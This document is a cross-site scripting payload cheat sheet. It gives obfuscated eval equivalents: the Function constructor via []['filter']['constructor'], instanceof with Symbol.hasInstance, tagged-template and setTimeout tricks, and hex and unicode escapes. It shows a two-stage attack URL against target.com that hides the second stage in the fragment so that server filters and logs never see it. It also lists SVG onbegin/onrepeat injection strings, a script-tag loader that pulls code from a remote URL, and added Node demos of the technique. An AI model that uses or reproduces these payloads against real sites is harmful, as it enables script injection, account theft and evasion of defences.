eval('var a=document.createElement(\'script\');a.src=\'arr0w1_url\';document.body.appendChild(a)')
Note: eval(CODE) <=> []["filter"]["constructor"](CODE)()  ([]["filter"]["constructor"] is the Function constructor; Function(CODE)() runs CODE as global code, so unlike a direct eval it cannot see the caller's local variables)
[]["filter"]["constructor"]('var a=document.createElement(\'script\');a.src=\'arr0w1_url\';document.body.appendChild(a)')()
eval(atob('arr0w1_base64'))
Note: uses only ` \ {} [] : plus letters, no parentheses or quotes. `x instanceof y` calls y[Symbol.hasInstance](x), so the object literal {[Symbol[`hasInstance`]]:eval} turns instanceof into an indirect (global-scope) eval of the left-hand string; the \x28 \x29 \x27 escapes are decoded by the template literal at parse time
`eval\x28atob\x28\x27arr0w1_base64\x27\x29\x29`instanceof{[Symbol[`hasInstance`]]:eval}
Note: equivalent string escapes: \x61 \u0061 \u{61} \u{000000061} (all produce "a"; the \u forms are also accepted inside identifiers, \x only inside string and template literals)
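The primitives above, exercised in plain JavaScript as an added example (Node, no DOM; this is not code from the original page). The global name arr0w1_hit and the base64 it decodes are constructed markers standing in for arr0w1_base64.

```javascript
// Added example, not from the page: the eval-equivalents above exercised in Node
// (no DOM is needed; the "payload" only sets a global so the effect can be checked).
// arr0w1_hit is a constructed marker name; the base64 stands in for arr0w1_base64.

// 1. []["filter"]["constructor"] is the Function constructor itself.
function filterCtorIsFunction() {
  return []["filter"]["constructor"] === Function;
}

// 2. The "eval <=> Function" equivalence holds only for global code: Function(CODE)()
//    cannot see local bindings that a direct eval(CODE) can.
function scopeDifference() {
  const secret = "local";
  return {
    viaEval: eval("typeof secret"),                                      // "string"
    viaFunction: []["filter"]["constructor"]("return typeof secret")(),  // "undefined"
  };
}

// 3. The four escape spellings all denote the same code point.
function escapesAreEquivalent() {
  return "\x61" === "\u0061" && "\u0061" === "\u{61}" && "\u{61}" === "\u{000000061}";
}

// 4. A tagged template is a call: f`1` invokes f(["1"]). String methods coerce the
//    array back to "1", which is why location.hash.slice`1` works without parentheses.
function tagCallPassesArray() {
  const seen = (strings) => strings;
  return { arg: seen`1`, sliced: "#payload".slice`1` };   // ["1"], "payload"
}

// 5. `x instanceof y` calls y[Symbol.hasInstance](x). With eval as the handler this is
//    an indirect (global-scope) eval with no parentheses at all; the expression itself
//    only yields a boolean, so the payload must act by side effect.
function evalViaInstanceof() {
  delete globalThis.arr0w1_hit;
  const b64 = btoa("globalThis.arr0w1_hit='stage2'");   // constructed stage-2 code
  // Same shape as the backtick payload above; the parentheses only exist after the
  // template literal has decoded \x28 / \x29 at parse time.
  `eval\x28atob\x28\x27${b64}\x27\x29\x29`instanceof{[Symbol[`hasInstance`]]:eval};
  return globalThis.arr0w1_hit;   // "stage2"
}
```

Point 2 is the practical limit of the Function trick: a payload that needs a variable from the surrounding function must use direct eval or the instanceof form, which also runs as global code.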
⚠️ Will be triggered when someone visits the URL:
https://target.com/page?title="><script>eval(location.hash.split(%27%23%27)[1])</script><i id="#'eval\x28atob\x28\x27arr0w1_base64\x27\x29\x29'instanceof{[Symbol['hasInstance']]:eval}
Note: only the ?title= part is sent to the server; the fragment after # stays in the browser, so the second stage never reaches server-side filters or logs
⚠️ Step 1. Injection
eval(location.hash.slice(1))
// or
[]['constructor']['constructor']`a${location['hash']['slice']`1`}```
// []['constructor']['constructor'] is Function; the tagged call passes ["a",""] (parameter list "a,") and the hash without '#' as the body, and the trailing `` calls the result
// or
setTimeout`\u0065\u0076\u0061\u006c\u0028\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0061\u0073\u0068\u002e\u0073\u006c\u0069\u0063\u0065\u0028\u0031\u0029\u0029`
// setTimeout receives the template strings array, coerces it to "eval(location.hash.slice(1))" and runs it as code
⚠️ Step 2. Execution - Will be triggered when someone visits the URL:
https://target.com/page_with_the_payload#arr0w1_on_event_js
// or
https://target.com/page_with_the_payload#'eval\x28atob\x28\x27arr0w1_base64\x27\x29\x29'instanceof{[Symbol['hasInstance']]:eval}
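The two-stage delivery end to end, as an added example that is not part of the original page. It runs in Node: `location` is a constructed stand-in built from a WHATWG `URL` object (a browser's `window.location` exposes the same `.hash`), and arr0w1_hit plus the base64 it decodes are constructed markers standing in for arr0w1_base64. It also shows two edge cases a practitioner hits with this technique: `split('#')[1]` truncating at a second `#`, and the URL parser percent-encoding some characters in the fragment.

```javascript
// Added example, not from the page: stage 1 (injected) + stage 2 (in the fragment)
// simulated in Node. `location` is a constructed stand-in built from a WHATWG URL;
// arr0w1_hit and the base64 are constructed markers for arr0w1_base64.

// What the request line carries: path and query. The fragment is never sent.
function serverVisiblePart(href) {
  const u = new URL(href);
  return u.pathname + u.search;   // "/page?title=..." for the URL above; u.hash stays client-side
}

// Stage 1 + stage 2 end to end, with the single-quoted instanceof payload in the hash.
function runTwoStage() {
  delete globalThis.arr0w1_hit;
  const b64 = btoa("globalThis.arr0w1_hit='via-hash'");   // constructed stage-2 code
  const stage2 = "'eval\\x28atob\\x28\\x27" + b64 + "\\x27\\x29\\x29'instanceof{[Symbol['hasInstance']]:eval}";
  const location = new URL("https://target.com/page_with_the_payload#" + stage2);
  eval("eval(location.hash.slice(1))");   // the injected stage 1, verbatim
  return globalThis.arr0w1_hit;           // "via-hash"
}

// Caveat 1: split('#')[1] stops at the next '#'; slice(1) keeps the whole fragment.
function splitVersusSlice() {
  const location = new URL("https://target.com/page#a='#';b=1");
  return { viaSplit: location.hash.split('#')[1], viaSlice: location.hash.slice(1) };
  // { viaSplit: "a='", viaSlice: "a='#';b=1" }
}

// Caveat 2: the URL parser percent-encodes space, ", <, > and ` in the fragment (the
// WHATWG fragment percent-encode set), so the backtick form of the payload would arrive
// as %60...%60 and fail to parse. Single quotes and backslashes survive, which is why the
// hash variant above uses them. If such characters are unavoidable, stage 1 must decode:
// eval(decodeURIComponent(location.hash.slice(1)))
function fragmentEncoding() {
  const location = new URL("https://target.com/page#x = `y`");
  return {
    raw: location.hash.slice(1),                          // "x%20=%20%60y%60"
    decoded: decodeURIComponent(location.hash.slice(1)),  // "x = `y`"
  };
}
```

`runTwoStage` uses a direct `eval` only so that the injected stage 1 string resolves the local `location` stand-in; in a browser, `location` is a global and the payload is written exactly as shown on the page.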
"><svg style=display:none><set onbegin="ARR0W1_ON_EVENT_JS_PLACEHOLDER" dur=1s></svg><x id="
"><svg style=display:none><set onbegin=`eval\x28atob\x28\x27ARR0W1_BASE64_PLACEHOLDER\x27\x29\x29`instanceof{[Symbol[`hasInstance`]]:eval} dur=1s></svg><x id="
"><svg style=display:none><set onbegin=[]['filter']['constructor'](atob('ARR0W1_BASE64_PLACEHOLDER'))() dur=1s></svg><x id="
"><svg style=display:none><animate onrepeat="ARR0W1_ON_EVENT_JS_PLACEHOLDER" dur=1s repeatCount=2></svg><x id="
"><svg style=display:none><animate onrepeat=`eval\x28atob\x28\x27ARR0W1_BASE64_PLACEHOLDER\x27\x29\x29`instanceof{[Symbol[`hasInstance`]]:eval} dur=1s repeatCount=2></svg><x id="